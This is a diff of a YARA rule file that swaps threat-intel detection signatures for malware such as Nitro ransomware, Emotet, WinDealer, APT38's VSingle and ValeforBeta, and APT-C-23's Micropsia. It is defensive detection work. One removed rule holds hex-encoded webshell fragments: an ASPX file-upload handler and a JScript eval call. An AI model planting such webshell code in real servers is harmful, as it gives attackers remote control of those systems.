+		$s4 = { 8b 8c 24 2c 02 00 00 8b 94 24 28 02 00 00 55 57 51 52 8d 44 24 24 53 50 89 74 24 2c e8 05 fb ff ff b9 41 00 00 00 33 c0 8d bc 24 34 01 00 00 83 c4 18 f3 ab 8d 8c 24 1c 01 00 00 51 68 04 01 00 00 ff 15 [2] 03 10 b9 41 00 00 00 33 c0 8d 7c 24 18 50 f3 ab [3] 01 }
+		$s5 = { 56 6a 10 e8 [3] 00 8b f0 85 f6 74 3a 8b 4c 24 0c 8d 46 04 85 c9 c7 06 [3] 10 c7 00 00 00 00 00 50 74 11 8b 44 24 0c 50 e8 [3] 00 89 46 08 8b c6 5e c3 8b 4c 24 0c 51 e8 [3] 00 89 46 08 8b c6 5e c3 33 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 300KB and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Nitro_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect Nitro ransomware"
+		description = "Detect WinDealer implant"
 		author = "Arkbird_SOLG"
-		id = "256059b2-1683-5108-8fc8-3cf0b2e7b613"
-		date = "2021-08-12"
-		modified = "2021-08-13"
-		reference = "https://bazaar.abuse.ch/browse/tag/NitroRansomware/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-13/Nitro/RAN_Nitro_Aug_2021_1.yara#L1-L23"
+		id = "7ffece8a-b56a-5893-a135-3001c0327f66"
+		date = "2021-10-30"
+		modified = "2021-10-31"
+		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "c31267cd9bc6c63db8e32b2a0e7518b0432d62f1de52117b9e903fc3370a1f4d"
+		logic_hash = "b6211274a0ffa55723d3c34763540278197507b4bd4b853249e16501a3aa5acb"
+		score = 75
+		quality = 71
+		tags = "FILE"
+		hash1 = "1e9fc7f32bd5522dd0222932eb9f1d8bd0a2e132c7b46cfcc622ad97831e6128"
+		hash2 = "b9f526eea625eec1ddab25a0fc9bd847f37c9189750499c446471b7a52204d5a"
+		tlp = "white"
+		adversary = "LuoYu"
+
+	strings:
+		$s1 = { 8b ec 81 ec 64 03 00 00 53 56 33 db 6a 64 8d 45 9c 53 50 e8 [2] 00 00 be 00 01 00 00 8d 85 9c fc ff ff 56 53 50 e8 [2] 00 00 56 8d 85 9c fd ff ff 53 50 e8 [2] 00 00 56 8d 85 9c fe ff ff 53 50 e8 [2] 00 00 83 c4 30 8d 45 9c 6a 64 50 ff 15 [2] 41 00 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 38 9d 9c fe ff ff 5e 5b 75 20 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 68 [2] 41 00 ff 75 08 ff 15 [2] 41 00 83 c4 14 6a }
+		$s2 = { 8b ec b8 40 1c 00 00 e8 [2] 00 00 56 57 33 ff 68 [2] 41 00 89 7d f8 ff 15 [2] 41 00 8b f0 6a 32 8d 45 c0 57 50 e8 [2] 00 00 83 c4 10 3b f7 74 1c 6a 5c 56 ff 15 [2] 41 00 59 3b c7 59 74 0d 40 50 8d 45 c0 50 e8 [2] 00 00 59 59 be 00 04 00 00 8d 85 c0 f7 ff ff 56 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 fb fd ff ff 83 c4 14 39 7d fc 75 24 56 8d 85 c0 f7 ff ff 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 ?? fc ff ff 83 c4 14 56 8d 85 c0 fb ff ff 57 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 83 c4 14 83 7d fc 0a 7e 3e 83 f8 0a 7e 6d 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 f7 ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 4d fd ff ff 83 c4 1c 89 45 f8 eb 5c 83 f8 0a 7e 2f 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 16 fd ff ff 83 c4 18 eb c7 6a 43 8d 45 f4 68 [2] 41 00 50 ff 15 [2] 41 00 83 c4 0c 8d 45 f8 57 57 57 57 50 57 8d 45 f4 57 50 ff 15 [2] 41 00 8b 45 f8 }
+		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4e 65 74 77 6f 72 6b 5c 7b 34 44 33 36 45 39 37 32 2d 45 33 32 35 2d 31 31 43 45 2d 42 46 43 31 2d 30 38 30 30 32 42 45 31 30 33 31 38 7d 5c 25 73 5c 43 6f 6e 6e 65 63 74 69 6f 6e }
+		$s4 = { 6d 61 63 3a 20 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 }
+		$s5 = { 8b d8 59 85 db 59 74 57 56 e8 [2] 00 00 03 d8 53 ff 15 [2] 41 00 6a 00 50 e8 [2] ff ff 6a 64 8d 45 9c 6a 00 50 e8 [2] 00 00 83 c4 1c 8d 45 9c 68 [2] 41 00 68 [2] 41 00 50 ff 15 [2] 41 00 66 8b 8f d2 07 00 00 51 8a 8f d0 07 00 00 51 50 8d 45 9c 50 e8 ?? f1 ff ff 83 c4 1c 5f 5e 33 c0 5b c9 c3 55 }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
+}
+rule ARKBIRD_SOLG_MAL_Emotet_Nov_2021_1 : FILE
+{
+	meta:
+		description = "Detect Emotet loader"
+		author = "Arkbird_SOLG"
+		id = "ad67c735-7ed9-5440-b693-55dce9840f56"
+		date = "2021-11-15"
+		modified = "2021-11-16"
+		reference = "https://cyber.wtf/2021/11/15/guess-whos-back/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-16/MAL_Emotet_Nov_2021_1.yara#L1-L19"
+		license_url = "N/A"
+		logic_hash = "9ae3cbf863fdf3addd7ec00b4d6b55024c3159156518ef15fff79f5a92988297"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13"
-		hash2 = "6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf"
-		hash3 = "89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559"
-		hash4 = "d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0"
-		hash5 = "dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b"
+		hash1 = "0865bd192e226da2c40b8bdd33a65ef41ca255a0031b3b36ab6a657ba6675d5e"
+		hash2 = "14613fa0b6eea4cd9205ffbe1c462178c94298707d19f78a27eec3dece8765f0"
 		tlp = "white"
-		adversary = "-"
+		adversary = "TrickBot Gang"
 
 	strings:
-		$s1 = { 1f 1a 28 ?? 00 00 0a [0-2] 72 ?? 14 00 70 28 15 00 00 0a 80 32 00 00 04 28 ?? 00 00 06 7e 32 00 00 04 6f ?? 00 00 0a [0-1] 7e 2f 00 00 04 16 7e 32 00 00 04 7e 30 00 00 04 7e 31 00 00 04 60 28 ?? 00 00 06 26 2a }
-		$s2 = { 02 [0-5] 72 df 00 00 70 28 1b 00 00 }
-		$s3 = { 1f 1a 28 ?? 00 00 0a 0a 1f 1c 28 ?? 00 00 0a 0b 7e 21 00 00 04 06 72 ?? 0c 00 70 28 15 00 00 0a 6f 16 00 00 0a [2] ?? 00 }
-		$s4 = { 7e 4e 00 00 0a 0a [0-1] 72 [2] 00 70 73 ?? 00 00 06 0b [0-1] 07 72 [2] 00 70 6f ?? 00 00 06 [1-3] 8d 7f 00 00 01 25 16 1f 0a 9d 6f ?? 00 00 0a 1c 9a 0a [0-1] de ?? 07 2c ?? 07 6f 42 00 00 0a }
-		$s5 = { 7e 4e 00 00 0a 0a [0-1] 73 ?? 00 00 0a 0b [0-1] 07 72 ?? 14 00 70 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 0a }
+		$s1 = { 8b 4d 08 0f b6 02 0f b6 31 2b f0 75 18 0f b6 71 01 0f b6 42 01 2b f0 75 0c 0f b6 71 02 0f b6 42 02 2b f0 74 10 33 c9 85 f6 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 49 03 0f b6 42 03 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 8b c1 eb 56 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 0c 0f b6 51 01 0f b6 46 01 2b d0 74 06 33 c9 85 d2 eb b4 0f b6 49 02 0f b6 46 02 eb be 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 e0 0f b6 49 01 0f b6 46 01 eb a4 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 eb 96 33 c0 5e 5b 5d c3 8b ff }
+		$s2 = { 8b 75 10 83 e0 3f 8b 5d 18 6b c8 38 c1 fa 06 89 75 a0 89 5d c4 89 55 b0 8b 04 95 [2] 03 10 89 4d bc 8b 44 08 18 89 45 9c 8b 45 14 03 c6 89 45 ac ff 15 ?? 40 03 10 80 7b 14 00 89 45 90 75 07 8b cb e8 [2] ff ff 8b 43 0c 8b 75 08 8b fe 8b 40 08 89 45 98 33 c0 ab ab ab 8b 45 a0 8b d0 89 55 d0 3b 45 ac 0f 83 14 03 00 00 8b 7d bc 33 db 89 5d b8 81 7d 98 e9 fd 00 00 8a 02 88 45 cf 8b 45 b0 89 5d c0 c7 45 d4 01 00 00 00 8b 0c 85 }
+		$s3 = { 53 53 40 6a 05 89 45 d0 8d 45 d8 50 ff 75 d4 8d 45 c0 50 53 ff 75 90 e8 [2] ff ff 83 c4 20 89 45 c8 85 c0 0f 84 00 01 00 00 53 8d 4d a4 51 50 8d 45 d8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 dd 00 00 00 8b 55 d0 8b ca 2b 4d a0 8b 46 08 03 c1 89 45 b8 89 46 04 8b 45 c8 39 45 a4 0f 82 c6 00 00 00 80 7d cf 0a 75 3c 6a 0d 58 53 66 89 45 a8 8d 45 a4 50 6a 01 8d 45 a8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 95 00 00 00 83 7d a4 01 0f 82 93 00 00 00 ff 46 08 ff 46 04 8b 46 04 8b 55 d0 89 45 b8 3b 55 ac 0f 82 6f fd ff ff eb 79 85 }
+		$s4 = { ba 08 00 00 00 c1 e2 00 8b 45 f0 8b 4c 10 78 03 4d fc 89 4d f8 ba 08 00 00 00 6b c2 0c 8b 4d f0 83 7c 01 78 00 74 09 c7 45 e8 0c 00 00 00 eb 07 c7 45 e8 01 00 00 00 8b 55 e8 89 55 e4 8b 45 e4 8b 4d f0 8b 54 c1 78 89 55 dc 8b 45 e4 8b 4d f0 8b 54 c1 7c 89 55 d8 8b 45 dc 03 45 fc 89 45 d4 8d 4d c8 51 6a 04 8b 55 d8 52 8b 45 d4 50 ff 15 04 40 03 10 8b 4d f8 83 79 0c 00 0f 84 cf }
+		$s5 = { 83 20 00 33 c9 21 4d e8 53 8b 5d 08 57 33 ff 89 4d e4 89 7d e0 8b 03 85 c0 74 56 8d 4d fc 66 c7 45 fc 2a 3f 51 50 c6 45 fe 00 e8 12 55 00 00 59 59 85 c0 75 1a 8d 45 e0 50 33 c0 50 50 ff 33 e8 13 01 00 00 8b f0 83 c4 10 85 f6 75 74 eb 13 8d 4d e0 51 50 ff 33 e8 ad 01 00 00 83 c4 0c 85 c0 75 1d 83 c3 04 8b 03 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 4 of them
 }
-rule ARKBIRD_SOLG_APT_UNC2452_Webshell_Chopper_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT38_Vsingle_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect exploit listener in the exchange configuration for Webshell Chopper used by UNC2452 group"
+		description = "Detect VSingle used in attacks against Japanese organisations by APT38"
 		author = "Arkbird_SOLG"
-		id = "174af8e1-0df0-5ad7-ac7d-a208f64cb765"
-		date = "2021-03-07"
-		modified = "2021-03-07"
+		id = "d1d640f6-bcec-5364-8ea5-e0c0b86da6e1"
+		date = "2021-03-23"
+		modified = "2021-03-24"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-07/UNC2452/APT_UNC2452_Webshell_Chopper_Mar_2021_1.yar#L1-L26"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_VSingle_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "77bd7e5c10aa9cf2b407b37a76954b4eed163e36653e1fb3cde5de853f824cf0"
-		score = 75
-		quality = 73
+		logic_hash = "d01baac099ce33b837c83d6778900f7e55b8c63e75d0e552c10ababc8dec744c"
+		score = 50
+		quality = 69
 		tags = "FILE"
+		hash1 = "487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e"
+		level = "experimental"
 
 	strings:
-		$l1 = { 20 68 74 74 70 3a 2f 2f ?? 2f 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 22 63 23 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 76 6f 69 64 20 50 61 67 65 5f 4c 6f 61 64 28 6f 62 6a 65 63 74 20 73 65 6e 64 65 72 2c 20 45 76 65 6e 74 41 72 67 73 20 65 29 7b 69 66 20 28 52 65 71 75 65 73 74 2e 46 69 6c 65 73 2e 43 6f 75 6e 74 21 3d 30 29 20 7b 20 52 65 71 75 65 73 74 2e 46 69 6c 65 73 5b 30 5d 2e 53 61 76 65 41 73 28 53 65 72 76 65 72 2e 4d 61 70 50 61 74 68 28 22 [5-14] 22 29 29 3b 7d 7d 3c 2f 73 63 72 69 70 74 3e }
-		$l2 = { 68 74 74 70 3a 2f 2f ?? 2f 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 66 75 6e 63 74 69 6f 6e 20 50 61 67 65 5f 4c 6f 61 64 28 29 7b 65 76 61 6c 28 [-] 2c 22 75 6e 73 61 66 65 22 29 3b 7d 3c 2f 73 63 72 69 70 74 3e }
-		$c1 = { 5c 4f 41 42 20 28 44 65 66 61 75 6c 74 20 57 65 62 20 53 69 74 65 29 }
-		$c2 = "ExternalUrl" fullword ascii
-		$c3 = { 49 49 53 3a 2f 2f [10-30] 2f 57 33 53 56 43 2f [1-3] 2f 52 4f 4f 54 2f 4f 41 42 }
-		$c4 = "FrontEnd\\HttpProxy\\OAB" fullword ascii
-		$c5 = "/Configuration/Schema/ms-Exch-OAB-Virtual-Directory" fullword ascii
+		$dbg1 = { 68 74 74 70 [0-1] 3a 2f 2f 25 73 25 73 }
+		$dbg2 = { 43 72 65 61 74 65 4e 61 6d 65 64 50 69 70 65 41 20 66 69 6e 69 73 68 65 64 20 77 69 74 68 20 45 72 72 6f 72 2d 25 64 }
+		$dbg3 = { 4f 53 3a 20 25 73 25 73 20 53 50 20 25 64 20 25 73 20 28 25 64 2e 25 64 2e 25 64 29 0d 0a }
+		$dbg4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 75 00 20 00 2f 00 63 00 20 00 25 00 73 }
+		$dbg5 = { 0d 0a 43 6f 6f 6b 69 65 3a 20 25 73 }
+		$dbg6 = { 25 73 5f 6d 61 69 6e }
+		$dbg7 = { 25 73 5f 66 69 6e }
+		$dbg8 = "3%3*373<3I3N3[3`3m3r3" fullword ascii
+		$s1 = { 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 }
+		$s2 = { 51 83 7d 08 00 75 07 b8 5b ab 66 00 eb 35 8b 45 08 89 45 fc 8b 4d fc }
 
 	condition:
-		filesize > 1KB and 1 of ( $l* ) and 3 of ( $c* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $dbg* ) and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT38_Valeforbeta_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect encoded Kimsuky shellcode used in fake PDF against South Korea"
+		description = "Detect ValeforBeta used in attacks against Japanese organisations by APT38"
 		author = "Arkbird_SOLG"
-		id = "8df7090a-6583-5d25-92bd-422e6b4191f7"
-		date = "2021-08-03"
-		modified = "2021-08-04"
+		id = "74a20725-3e52-5fef-9934-c812137dc989"
+		date = "2021-03-23"
+		modified = "2021-03-24"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1.yara#L1-L22"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_ValeforBeta_Mar_2021_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "54f549b92c232f789aff039c748f1f987e68e9ee10dfab309f2ecba16d574cdb"
+		logic_hash = "0ee8202b8978bf487df2a63c17d139076f2e9f68f1827a17929522060a72937a"
+		score = 50
+		quality = 67
+		tags = "FILE"
+		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
+		level = "experimental"
+
+	strings:
+		$dbg1 = { 2f 64 64 65 00 00 00 64 64 65 65 78 65 63 }
+		$dbg2 = { 25 73 5c 53 68 65 6c 6c 4e 65 77 }
+		$dbg3 = { 25 73 20 28 25 73 3a 25 64 29 0a 25 73 }
+		$dbg4 = { 7b 25 30 38 58 2d 25 30 34 58 2d 25 30 34 58 2d 25 30 32 58 25 30 32 58 2d 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 7d }
+		$dbg5 = { 25 73 25 73 2e 64 6c 6c }
+		$dbg6 = { 25 73 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 25 73 00 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 5c 25 73 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 74 6f 5c 25 73 00 25 73 5c 44 65 66 61 75 6c 74 49 63 6f 6e 00 00 25 73 5c 53 68 65 6c 6c 4e 65 77 00 2c 25 64 00 63 6f 6d 6d 61 6e 64 00 20 22 25 31 22 00 00 00 20 2f 70 20 22 25 31 22 00 00 00 00 20 2f 70 74 20 22 25 31 22 20 22 25 32 22 20 22 25 33 22 20 22 25 34 22 }
+		$dbg7 = { 43 4c 53 49 44 5c 25 31 5c 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 }
+		$s1 = { 74 f1 ff b5 a8 fe ff ff 8d 4b 10 c7 43 08 03 00 00 00 e8 3c cf fd ff eb da 8d 8d ac fe ff ff e8 3f 1a fc ff 83 65 fc 00 8d 85 ac fe ff ff 50 57 e8 bd fd ff ff ff b5 ac fe ff ff ff 15 24 44 47 00 85 c0 0f 85 be 00 00 00 50 50 8d 8d a0 fe ff ff 51 8d 8d 9c fe ff ff 51 50 50 50 ff b5 ac fe ff ff ff 15 70 42 47 00 85 c0 75 1f ff b5 a8 fe ff ff 53 e8 dc fe ff ff 8b 8d ac fe ff ff }
+		$s2 = { 45 fc 8b 45 0c 0f b6 48 0f 56 51 0f b6 48 0e 51 0f b6 48 0d 51 0f b6 48 0c 51 0f b6 48 0b 51 0f b6 48 0a 51 0f b6 48 09 51 0f b6 48 08 8b 75 08 83 a5 f8 fe ff ff 00 51 0f b7 48 06 51 0f b7 48 04 51 ff 30 8d 85 fc fe ff ff 68 48 aa 47 00 68 00 01 00 00 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $dbg* ) and 1 of ( $s* )
+}
+rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_2 : FILE
+{
+	meta:
+		description = "Detect Micropsia used by APT-C-23 (Build 2020)"
+		author = "Arkbird_SOLG"
+		id = "cdd95b35-09b4-5412-bd86-55c2e7523d3e"
+		date = "2021-03-31"
+		modified = "2021-03-31"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_2.yar#L1-L26"
+		license_url = "N/A"
+		logic_hash = "a00091161ec69c9885e983117e2b424f860bfbab2551ea23b74c37fc062850b9"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "d9b938d89a13620aabe81e0a9d02778cad8658cbfd6f15e7dab47b1118b53237"
+		hash2 = "42f40fb2e4f971807fcb771c9aacc5a2361fdcdaf3eaafc31b22096d81dd0666"
+		level = "experimental"
+
+	strings:
+		$code1 = { 8d 45 f8 8b 15 90 c7 69 00 e8 1e 05 d5 ff c7 45 d0 00 00 00 00 c7 45 d4 00 00 00 00 8b 45 d8 8b 58 5c 85 db 74 22 8b c3 8b 10 ff 12 52 50 8b 45 d8 8b 40 5c e8 af 4b db ff 29 04 24 19 54 24 04 58 5a 89 45 d0 89 55 d4 6a 04 8d 45 d8 50 6a 2d 8b 45 d8 8b 80 a4 00 00 00 50 e8 59 cd ff ff c7 45 c4 02 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 3b cd ff ff c7 45 c4 01 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 1d cd ff ff 33 c0 5a 59 59 64 89 10 68 aa df 6b 00 8b 45 e8 e8 a0 }
+		$code2 = { 6a 00 8b 45 d0 50 6a 00 6a 00 6a 00 6a 00 8b 45 d8 8b 80 a4 00 00 00 50 e8 d1 cc ff ff 85 c0 75 19 8b 15 50 a7 6e 00 8b 4d e8 8b 45 ec e8 9c fc }
+		$code3 = { 8d 4d f4 8b 45 d4 8b 40 0c ba 01 00 00 00 8b 18 ff 53 0c 8b 45 d4 8b 50 10 a1 bc 1c 6f 00 e8 82 bc ff ff 8b 55 f4 a1 bc 1c 6f 00 e8 75 bc ff ff 8b 45 f4 ba f4 7c 6d 00 e8 a0 4c d3 ff 0f 85 cf 00 00 00 ba 08 7d 6d 00 a1 bc 1c 6f 00 e8 53 bc ff ff 33 c0 55 68 9a 76 6d 00 64 ff 30 64 89 20 33 c0 89 45 dc 8d 55 9c b8 38 7c 6d 00 e8 7b 86 d5 ff ff 75 9c 68 50 7c 6d 00 8d 55 98 b8 09 00 00 00 e8 c6 c4 ff ff ff 75 98 68 60 7c 6d 00 8d 45 dc ba 04 00 00 00 e8 91 4b d3 ff e8 c4 22 d5 ff dd 5d c0 9b ff 75 c4 ff 75 c0 8d 4d e0 8b 15 30 ab 6e 00 b8 70 7c 6d 00 e8 97 32 d5 ff 8b 45 d4 83 c0 14 }
+		$s1 = { 4a 00 50 00 45 00 47 00 20 00 49 00 6d 00 61 00 67 00 65 00 20 00 46 00 69 00 6c 00 65 00 25 00 53 00 63 00 68 00 65 00 6d 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 25 00 73 }
+		$s2 = "Download start ." fullword wide
+		$s3 = "application/x-msdownload" fullword wide
+		$s4 = "Start Download File" fullword wide
+		$s5 = "getHttpDownload" fullword ascii
+		$s6 = "Download start ." fullword wide
+		$s7 = "-start" fullword wide
+		$s8 = "-Winapi.ImageHlp" fullword ascii
+		$s9 = "postHttpDownload" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
+}
+rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_1 : FILE
+{
+	meta:
+		description = "Detect Micropsia used by APT-C-23 (Build 2018)"
+		author = "Arkbird_SOLG"
+		id = "517a33bb-0214-588f-80e4-dc82f2552330"
+		date = "2021-03-31"
+		modified = "2021-03-31"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_1.yar#L1-L24"
+		license_url = "N/A"
+		logic_hash = "69baab88d80ab15e08f3b08dfca45a1fee6c2e6077152906f391618713fac2ef"
 		score = 50
+		quality = 69
+		tags = "FILE"
+		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
+		level = "experimental"
+
+	strings:
+		$code1 = { c7 85 6c fc ff ff 12 00 00 00 8b f4 8d 85 6c fc ff ff 50 8d 8d 78 fc ff ff 51 ff 15 44 b0 66 00 3b f4 e8 80 d6 fa ff 8d 85 78 fc ff ff 50 b9 e0 83 66 00 e8 06 0d fb ff 6a 00 e8 24 0a 00 00 83 c4 04 50 e8 a2 d9 fa ff 83 c4 04 c7 85 60 fc ff ff }
+		$code2 = { 68 34 4f 61 00 8d 85 cc fd ff ff 50 e8 3d 02 fd ff 83 c4 08 8b f4 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff 15 60 b3 66 00 3b f4 e8 f2 0d fd ff 89 85 c0 fd ff ff 83 bd c0 fd ff ff 00 0f 84 49 03 00 00 8b f4 6a 00 6a 00 6a 03 6a 00 6a 00 0f b7 05 d4 83 66 00 50 8b 4d 10 51 8b 95 c0 fd ff ff 52 ff 15 58 b3 66 00 3b f4 e8 b3 0d fd ff 89 85 b4 fd ff ff 83 bd b4 fd ff ff 00 0f 84 f4 02 00 00 8b f4 6a 00 a1 d8 83 66 00 50 6a 00 6a 00 68 5c 4f 61 00 8b 4d 14 51 8d 95 cc fd ff ff 52 8b 85 b4 fd ff ff 50 ff 15 70 b3 66 00 3b f4 e8 6e 0d fd ff 89 85 a8 fd ff ff 83 bd a8 fd ff ff 00 0f 84 af 02 00 00 c7 85 9c fd ff ff 00 00 00 00 83 }
+		$code3 = { 8b 85 60 fc ff ff 83 c0 01 89 85 60 fc ff ff 83 bd 60 fc ff ff 0a 7d 2a e8 3f fc fa ff 99 b9 1a 00 00 00 f7 f9 83 c2 41 88 95 57 fc ff ff 0f b6 85 57 fc ff ff 50 b9 e0 83 66 00 e8 8b 14 fb }
+		$s1 = "szhttpUserAgent" fullword ascii
+		$s2 = "httpUseragent" fullword ascii
+		$s3 = "dwByteRead" fullword ascii
+		$s4 = { 25 59 25 6d 25 64 2d 25 49 2d 25 4d 2d 25 53 }
+		$s5 = { 53 45 4c 45 43 54 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 76 61 63 75 75 6d 5f 64 62 2e 27 20 7c 7c 20 73 75 62 73 74 72 28 73 71 6c 2c 31 34 29 20 20 46 52 4f 4d 20 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 57 48 45 52 45 20 73 71 6c 20 4c 49 4b 45 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 25 27 }
